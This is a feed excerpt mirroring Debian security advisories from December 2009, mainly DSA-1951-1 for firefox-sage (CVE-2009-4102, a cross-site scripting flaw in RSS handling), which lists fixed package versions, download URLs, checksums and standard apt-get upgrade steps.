&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksniOkACgkQ62zWxYk/rQf4YgCePUowSZn5DwLJ98DvEL7T1mvC
&lt;br&gt;hZYAnicdU3gpH6ErJT0EG2JRC33uaHEv
&lt;br&gt;=qf6k
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1952-1--New-asterisk-packages-fix-several-vulnerabilities-tp26797347p26797347.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26796934</id>
	<title>[SECURITY] [DSA 1951-1] New firefox-sage packages fix insufficient input sanitizing</title>
	<published>2009-12-15T03:55:16Z</published>
	<updated>2009-12-15T03:55:16Z</updated>
	<author>
		<name>Steffen Joeris-3</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;Debian Security Advisory DSA-1951-1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26796934&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;
&lt;br&gt;&lt;a href=&quot;http://www.debian.org/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/&lt;/a&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Steffen Joeris
&lt;br&gt;December 15, 2009 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.debian.org/security/faq&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.debian.org/security/faq&lt;/a&gt;&lt;br&gt;- ------------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Package &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;: firefox-sage
&lt;br&gt;Vulnerability &amp;nbsp;: insufficient input sanitising
&lt;br&gt;Problem type &amp;nbsp; : remote
&lt;br&gt;Debian-specific: no
&lt;br&gt;CVE Id &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; : CVE-2009-4102
&lt;br&gt;Debian Bug &amp;nbsp; &amp;nbsp; : 559267
&lt;br&gt;&lt;br&gt;It was discovered that firefox-sage, a lightweight RSS and Atom feed
&lt;br&gt;reader for Firefox, does not sanitise the RSS feed information
&lt;br&gt;correctly, which makes it prone to a cross-site scripting and a
&lt;br&gt;cross-domain scripting attack.
&lt;br&gt;&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), this problem has been fixed in
&lt;br&gt;version 1.4.2-0.1+lenny1.
&lt;br&gt;&lt;br&gt;For the oldstable distribution (etch), this problem has been fixed in
&lt;br&gt;version 1.3.6-4etch1.
&lt;br&gt;&lt;br&gt;For the testing distribution (squeeze) and the unstable distribution
&lt;br&gt;(sid), this problem has been fixed in version 1.4.3-3.
&lt;br&gt;&lt;br&gt;&lt;br&gt;We recommend that you upgrade your firefox-sage packages.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 4.0 alias etch
&lt;br&gt;- -------------------------------
&lt;br&gt;&lt;br&gt;Debian (oldstable)
&lt;br&gt;- ------------------
&lt;br&gt;&lt;br&gt;Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; &amp;nbsp;607 d4175001caa8fc685f47452de46aaa03
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 135325 49c68a517b6611c7352feb6072be9567
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;13123 a59b6403405d4c6214b569fdb068049f
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.3.6-4etch1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 150172 57339ba6521e7611e4e27fce4f87df31
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny
&lt;br&gt;- --------------------------------
&lt;br&gt;&lt;br&gt;Debian (stable)
&lt;br&gt;- ---------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;15552 c62acce299739cfe09c5ed671f0d310f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 169202 71f4d7379bc6e39640fc20016493f129
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1039 f47c953cd90197453e1ce165f13cb701
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/f/firefox-sage/firefox-sage_1.4.2-0.1+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 171308 63a27b648f10e021b18acf9c8d8d24f0
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26796934&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksneJ0ACgkQ62zWxYk/rQeRnACgl5xAjdWg9H6/gvteFqVkY1bh
&lt;br&gt;w/kAnRzc6lGDWUAoe6H3pjfZdP1XhMDx
&lt;br&gt;=CsHJ
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1951-1--New-firefox-sage-packages-fix-insufficient-input-sanitizing-tp26796934p26796934.html" />
</entry>

</feed>
